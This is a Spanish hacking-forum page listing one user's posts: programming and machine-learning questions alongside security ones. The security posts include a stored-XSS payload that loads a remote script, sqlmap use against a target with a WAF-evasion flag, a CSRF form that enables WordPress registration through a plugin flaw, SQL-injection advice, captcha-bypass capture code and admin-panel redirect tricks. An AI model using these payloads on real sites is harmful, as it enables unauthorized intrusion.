Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - LKI

Páginas: [1] 2 3 ... 5
1
Underc0de / Re:Sorteo de fin de año!!
« en: Diciembre 09, 2020, 03:37:43 pm »
Mi nick @LKI
Etiqueto a @ANTRAX

2
Dudas y pedidos generales / Re:No me hallo con los contadores en Java.
« en: Julio 19, 2020, 11:31:29 pm »
Los contadores no son más que variables que van incrementando su valor, se utilizan generalmente para llevar un control del estado actual de un proceso (loop) , por ejemplo: Teniendo la siguiente lista de valores ([email protected] ,Carlos, [email protected], Juan, [email protected], Maria, [email protected], [email protected], [email protected]) diseñar un algoritmo que detecte los primeros cinco correos electrónicos en ella y terminar el proceso mostrando los correos electrónicos encontrados:

Código: [Seleccionar]
datos = ["[email protected]","Carlos", "[email protected]", "Juan", "[email protected]", "Maria", "[email protected]", "[email protected]", "[email protected]"]
correos = list()
contador = 0
for dato in datos:
   if contador >= 5:
      print("Se encontraron los primeros cinco correos electrónicos:")
      for correo in correos:
         print(correo)

      quit()
   if "@" in dato:
      contador = contador + 1
      correos.append(dato)


En este programa se recorre cada dato dentro de la lista, si el carácter "@" se encuentra dentro del dato, entonces se aumenta el contador en 1 y se procede a guardar el correo en cuestión en una nueva variable del tipo list. Luego en el primer condicional se evalúa si el contador es mayor o igual a 5, si es así se procede a mostrar los correos encontrados y terminar el programa. Obviamente la forma de detectar si es un correo en este caso es bastante pobre ya que no es la idea, sino entender como funcionan los contadores.
Espero haberte ayudado, cualquier duda que tengas me avisas.


3
Dudas y pedidos generales / Inyección XSS persistente
« en: Julio 17, 2020, 11:17:46 pm »
Hola amigos, tengo una duda y acudo a ustedes en busca de conocimiento y experiencia. Estoy probando una inyección xss en un input llamemosle "biografia" que se encuentra dentro de la página de configuración del perfil, digamos en /settings el payload es el siguiente:

Código: [Seleccionar]
</script><script src=www.examplesite.com/examplescript.js></script>
Luego de guardar los cambios recargo la página /settings y el script es ejecutado correctamente.
Lo que no entiendo es porque al visitar la página de mi perfil, digamos /profile no se carga el valor rellenado en el paso anterior, es decir, debería cargar el script. Pero en vez de ello no carga nada y deja el campo que debería rellenar de forma vacía:


(Se puede ver que dentro del tag <p></p> no carga ningún dato y se encuentra vacío)

Pero el script en cuestión es devuelto por el servidor, ya que al revisar el response se ve claramente que el script viaja de vuelta al cliente:



Mi consulta es, ¿si conocen a que se debe este comportamiento, y qué tipo de tácticas se pueden utilizar para poder bypassear cualquier tipo de restricción y que el script en cuestión se ejecute?. Desde ya, muchas gracias!!

4
Dudas y pedidos generales / Re:sqlmap error 403 forbidden
« en: Julio 15, 2020, 10:20:07 pm »
Hola @LKI

También deberías considerar que no te estén restringiendo el acceso por el agente de usuario (User Agent, en inglés) dependiendo de la ruta que estés accediendo y el que estés usando, puedes cambiarlo a uno muy conocido (como el de Mozilla Firefox o Google Chrome). En el manual (manpages.org/sqlmap) te indica cómo puedes cambiarlo.

~ DtxdF

Gracias, es correcto el error en definita era del User Agent. Agregué la siguiente flag al cmd y el ataque funcionó sin ningún problema:
Código: [Seleccionar]
--random-agent

5
Dudas y pedidos generales / Re:sqlmap error 403 forbidden
« en: Julio 10, 2020, 12:12:36 am »
Como le dije anteriormente, al intentar inyectar código, el mismo sitio puede que lo evite y lo redireccione un error 403. Sin embargo, entrando desde el navegador no se "notaría nada raro", por lo que una vez que se detecta algo inusual, directamente es bloqueado. Te dejo un enlace de un post del foro, en el que explica cómo puede detectar el WAF mediante la misma herramienta y bypassearlo (obviamente, esto no siempre funciona), de ahí puede que se saque la duda:

https://underc0de.org/foro/pentest/bypasseando-waf-con-sqlmap-tamper/

Espero haberte ayudado en algo. Saludos!
-Kirari

Gracias no creo que sea WAF ya que al inyectar código sql desde la url del navegador el servidor responde con un "Internal server error" en el body de la página a diferencia de sqlmap que devuelve el código de error HTTP 403.

6
Dudas y pedidos generales / Re:sqlmap error 403 forbidden
« en: Julio 09, 2020, 06:51:51 pm »
Buenas! Los problemas pueden ser varios, entre ellos de que no tenga los permisos suficientes para analizar ese directorio o también que haya un Firewall Web o IDS que esté evitando cualquier tipo de inyección de código, por lo que lo redirige a un error 403.

Saludos!
-Kirari

Gracias por tu respuesta lo raro, es que dicha url es accesible desde el browser sin añadir ninguna cookie o token de seguridad y lo mismo con postman. Parece que el servidor detecta de alguna forma que es un script, no se como.

7
Dudas y pedidos generales / sqlmap error 403 forbidden
« en: Julio 09, 2020, 05:54:20 pm »
Hola amigos, estoy tratando de usar sqlmap para testear una vulnerabilidad, pero a la hora de ejecutar el comando
Código: [Seleccionar]
sqlmap.py -u "tagetwebsite.com?example=1" obtengo el error 403 forbidden y luego cuando el script termina me indica que obtuvo todos errores 403 forbidden. Lo raro es que al usar postman puedo ejecutar dicha url sin ninguna cookie o token de autorización, lo mismo desde el browser o incógnito. ¿Alguna idea?
Dejo las imágenes con los resultados y errores de la consola:


8
Quiero saber si puedo acceder a su cuenta de facebook para ver si consigo información de cualquier tipo que me ayude a llegar a el.

Hola @ingen0
Segun las normas https://underc0de.org/foro/dudas-generales-121/(actualizado)-como-realizar-dudas-bien-redactadas/
Citar
II. Dudas no éticas.

Las dudas no éticas son, por desgracia, muy comunes en los foros de hacking y seguridad informática. Underc0de es un foro de ethical hacking, y así mismo se pide que las dudas sean éticas, es decir, sin contenido con fines ilícitos. A continuación, se listarán ciertas temáticas que realmente no tienen lugar en ethical hacking.

— Cómo hackear un Facebook.
— Cómo infectar a mi novia/o, sospecho que me engaña.

Estos son pocos ejemplos de situaciones que se generan frecuentemente en múltiples comunidades de hacking. Se solicita por favor evitar este tipo de publicaciones, dado que incumplen la normativa de la sección.

Lamento tu situacion, siempre hay personas sin escrupulos realizando este tipo de acciones, lo mejor es acudir a la policia local y realizar la denuncia. En los alrededores del lugar de intercambio puede existir alguna camara que ayude a identificar a la persona en cuestion.
Por mas legitimo que sea tu inconveniente no creo que alguien de aqui te ayude en la situacion.

El usuario también solicitó información sobre como encontrar información que le pueda ser útil para poder denunciar al estafador a partir del whatsapp que utilizó el estafador y del usuario de facebook, lo que se conoce como "doxing" y no se encuentra entre los temas prohibidos que has mencionado.

9
Hola underc0ders, tengo una duda,  me gustaría seguir expandiendo mis habilidades de detección de vulnerabilidades. Actualmente tengo conocimientos sobre SQL, XSS, LFI y Shell upload (no se si tiene un término para referirse a este ataque) ¿qué otras técnicas existen para verificar la seguridad de un sitio web?.
Saludos.

10
Dudas y pedidos generales / Hardware para Machine Learning
« en: Diciembre 25, 2019, 08:56:11 pm »
Hola a todos, estoy empezando en este mundo de machine learning con Python y Tensorflow. He logrado entrenar mi primer modelo y he podido implemenetarlo en Google Cloud. Me gustaría invertir en harware debido a que actualmente tengo una notebook un poco vieja que al ejecutar mi modelo demora mucho en devolver el resultado (15segundos) por ello utilizo Google Cloud que demora 5 a 7 segundos. Necesito asesoramiento ya que no tengo mucha idea de hardware, debería comprar una nueva pc y orientar todos los componentes a machine learning? o debería optimizar mi modelo entrenado para disminuir el tiempo de ejecución?. Dejo una captura de mis componentes actuales de hardware a lo mejor mejorando algún componente pueda mejorar el tiempo de ejecución?. Espero que alguien con conocimientos de ML pueda orientarme.



Saludos.

11
Hola chicos resulta que mi sitio de word press es vulnerable debido al plugin "HandL UTM Grabber V < 2.6.5". Me gustaría comprender esta vulnerabilidad, he leido este artículo: https://www.pluginvulnerabilities.com/2019/08/26/our-proactive-monitoring-caught-an-authenticated-option-update-vulnerability-in-handl-utm-grabber/ y no termino de comprender bien la vulnerabilidad, ¿cuál sería el daño que se puede ocasionar y cómo se llevaría acabo?

He probado ejecutar este código:
Código: [Seleccionar]
<html>
<body>
<form action="[url]http://vulnerable-site.com/wp-admin/admin-ajax.php?action=handl_notice_dismiss[/url]" method="POST">
<input type="hidden" name="field" value="users_can_register" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Y mi sitio devuelve un "0". ¿Significaría que el ataque se realizo con éxito? ¿Y ahora que acciones intrusivas podría realizar?


No he encontrado, más información que explique en detalle como llevar a cabo este ataque e información para comprender la vulnerabilidad. Espero que alguien pueda ayudarme.
Saludos.

12
Hola chicos estoy con un proyecto de tensorflow que funciona localmente a la perfección, he decidido subirlo a Google Cloud para poder hacer predicciones en línea. He probado enviar peticiones con el comando:

Código: [Seleccionar]
gcloud ai-platform predict --model my_model_test  --version model_v1 --json-instances prediction_input.json

Y el mismo retorna un array de números, que no me sirve, (en realidad no se interpretarlo). Por lo que seguí la siguiente guía de Google para tratar de devolver un string con la respuesta:

https://cloud.google.com/ml-engine/docs/custom-prediction-routines

Pero al momento de enlazar en la consola de Google ml (Crear versión de modelo) mi código personalizado que devuelve un string (Predictor), junto con el modelo entrenado (usé la versión 2.0 de TF) Obtengo el siguiente error: "Unexpected error when loading the model: "load_model" requires h5py.

Probé agregando la dependencia, como indica la guía usando setup.py, pero el error continúa. Espero que alguien pueda ayudarme!

Les dejo los recursos que estoy utilizando por si sirve para complementar la pregunta. https://github.com/zulu15/ML

13
Para verlo mejor, deberías dejar el codigo del .py

Saludos,
ANTRAX


Hola Antrax, gracias por tu respuesta, en realidad al estar usando una versión antigua del framework el comando training_dir no es reconocido, debería ser "model_dir". Lo raro es que el framework no te lo sugiera o avise. De todos modos, ya está solucionado. Gracias!

14
Hola chicos! estoy empezando a usar Google Colab y tensorflow, estoy entrenando un modelo en particular "faster_rcnn_inception_v2_coco" con el siguiente comando:

 
Código: [Seleccionar]
"python train.py --logtostderr --train_dir=training/ --pipeline_config_path=training/faster_rcnn_inception_v2_coco.config

El entrenamiento se ejecuta correctamente pero los checkpoints no se guardan en la carpeta especificada, es decir, "training", por el contrario veo que se guardan en /tmp/tmpXXX y en cada nuevo entrenamiento se crea una nueva carpeta temp y no se resume desde el último checkpoint sino que empieza desde 0. ¿Alguien sabe como puedo solucionar esto? Saludos.

15
Dudas y pedidos generales / [SOLUCIONADO] Tesseract OCR
« en: Octubre 01, 2019, 12:36:12 pm »
Hola a todos, tengo una duda, estoy investigando esta tecnología para el reconocimiento óptico de caracteres y estoy un poco perdido, he probado algunos ejemplos y han funcionado. Pero con la siguiente imágen estoy teniendo problemas:


El comando que uso es:

Código: [Seleccionar]
tesseract default.jpg output --psm 8 -c tessedit_char_whitelist=0123456789abcdfghijkmnlopqrsturstuvwxyzGres

Y el resultado obtenido es:
lost

Espero que me puedan guiar, o dar algún recurso donde pueda leer más. Saludos.

16
Hola a todos! ¿Cómo estan? tengo una duda, espero que alguien pueda ayudarme, estoy haciendo un proyecto para la universidad en C# y python, en python tengo el programa cliente y en C# tengo desarrollada una web api servidor que recibe los pedidos del cliente y los procesa y retorna los datos solicitados.

Mi problema surge debido a que debo ejecutar varios clientes al mismo tiempo, y la web api al recibir múltiples request procesa en forma asyncrona (eso creo..) estos pedidos alterando el resultado deseado, ya que cada programa cliente debe recibir datos únicos desde la api para realizar un proceso específico y actualmente a veces se retorna el mismo cliente desde la api (obtenidos desde base de datos) a varios programas cliente python.

Dejo los códigos por si sirve para darle contexto a la pregunta:

1) Se ejecuta un archivo .bat que abre x instancias del programa cliente hecho en python:

Código: [Seleccionar]
cd "C:\Users\mnn\Desktop\workspace"

start py cliente.py

start py cliente.py

start py cliente.py

.....

pause

2) Cada programa cliente llama a la web api en espera de datos únicos que utiliza para hacer su proceso:


3) La web api en c# recibe la request obtiene los datos (desde una base de datos sql server) de un cliente único que no está siendo utilizado por ningún programa cliente, asocia (inserta los dos id en una tabla de sql server) el id único del programa cliente python con el id único del cliente obtenido en la base de datos y retorna los datos del cliente. (Este es el paso que falla ya que la web api al procesar las request al mismo tiempo devuelve los mismos datos de un cliente a varios programas cliente python) (El código esta simplificado no se ven las querys por ejemplo ya que la idea es mostrar el flujo de llamadas de cliente a web api y de web api a base de datos y retorno de datos al cliente python)


Adjunto Log mostrando el resultado no deseado, es decir, procesamiento asyncrono (foto)



Espero haber podido ser claro!!

Saludos!

17
Dudas y pedidos generales / Re:Resolución de captcha
« en: Agosto 13, 2019, 01:40:06 pm »
Solucionado!! Encontré un script que utilizando la libreria PIL de python pude sacar una foto al captcha sin tener que realizar ninguna petición HTTP GET como ocurría con los métodos utilizados con javascript.

Código de resolución:

Función para tomar la foto:
Código: [Seleccionar]
def get_captcha(driver, element, path):
    # now that we have the preliminary stuff out of the way time to get that image :D
    location = element.location
    size = element.size
    # saves screenshot of entire page
    driver.save_screenshot(path)

    # uses PIL library to open image in memory
   
    image = Image.open(path)

    left = location['x']
    top = location['y']
    right = location['x'] + size['width']
    bottom = location['y'] + size['height']

    image = image.crop((left, top, right, bottom))  # defines crop points
    image.save(path, 'png')  # saves new cropped image
   


Código que llama a la función:
Código: [Seleccionar]
# download image/captcha
img = driver.find_element_by_css_selector("#captchaLogin")
get_captcha(driver, img, "captcha.png")

18
Dudas y pedidos generales / [SOLUCIONADO] Resolución de captcha
« en: Agosto 12, 2019, 10:33:28 pm »
Hola a todos!! ¿Cómo están?

Tengo una inquietud sobre la resolución de un captcha. He estado investigando y he descubierto que es posible la resolución de captchas de manera automática utilizando una técnica conocida como OCR (Reconocimiento Óptico de caracteres). Por el momento todo bien, mi problema surge cuando al inspeccionar el captcha en cuestión me encuentro con lo siguiente:

 
Cómo se ve en la imágen el tag img tiene un atributo src que apunta a una url dinámica, dejo el nodo html:
Código: [Seleccionar]
<img id="captchaLogin" src="captcha/default.aspx?pos=2&amp;vers=427404578" alt="Código de verificación">
Este es mi mayor problema ya que al tratar de obtener la imágen del captcha mediante varios métodos desde el lado de javascript he probado con librerías como html2canvas y html2picture, modificar el atributo del nodo img para que al hacer click descargue la imágen con el atributo donwload de HTML5, utilizar drag and drop creando nodos para que copie la imágen, etc y al final el resultado fue el mismo, el navegador en cada uno de los métodos realizaba una petición HTTP GET a la URL dinámica y la misma generaba una imágen distinta a la orginal, por lo que ninguno generaba el resultado que yo necesito, es decir, descargar la imágen original generada al cargar la página web. Tengo algunas ideas pero no se como se podrían llevar a cabo ya que personalmente no es mi fuerte la programación del lado cliente, como por ejemplo:


El navegador chrome tiene una pestaña que es neetwork en donde al aplicar el filtro Img permite visualizar los recursos de tipo Imágen que la web utiliza y haciendo click derecho se puede guardar la imágen, obviamente no se si es posible realizar esto mediante una forma automática.

Espero que alguno de ustedes pueda ayudarme. Saludos!!

19
Seguridad web y en servidores / Re:Inyección SQL [Curso]
« en: Julio 24, 2018, 02:46:55 pm »
Estoy estancado en el asunto del llamado ORDER BY, yo edtoy probando con esta página: http://www.noticias24.com/tecnologia/noticia/26528/de-esta-manera-podras-activar-los-chats-destacados-de-whatsapp/ y así es como lo coloco:
http://www.noticias24.com/tecnologia/noticia/26528/de-esta-manera-podras-activar-los-chats-destacados-de-whatsapp Order BY 17. Pero he intentado mas de 17 unas 30 veces y pues sigue recargando normal me explicas por favor, como podria obtener el resultado de tablas que hay en la database please

La inyección sql se hace por medio de url justo donde se recibe algún parámetro de algún tipo, en el caso de tu ejemplo la url hace referencia a un documento y no se encuentra recibiendo ningún parámetro por lo que no puedes inyectar código. Por ejemplo la url de underc0de https://underc0de.org/foro/index.php?action=post;quote=122789;topic=34484.0 tiene tres parámetros, los cuales por lo general los podras identificar seguidos del signo ? por ejemplo: el parámetro action recibe el valor post, el parámetro quote recibe el valor 122789 y topic recibe el valor 34484.0 .

20
Hola probé con el método de NoRedirect y al tratar de entrar a un panel de administrador recibía una página en blanco con lo siguiente:

HTTP/302: http://www.xxxx.ar/xxx/Default.aspx
Object moved to here.

al hacer click me volvía a redirigir al Default (INDEX).

Páginas: [1] 2 3 ... 5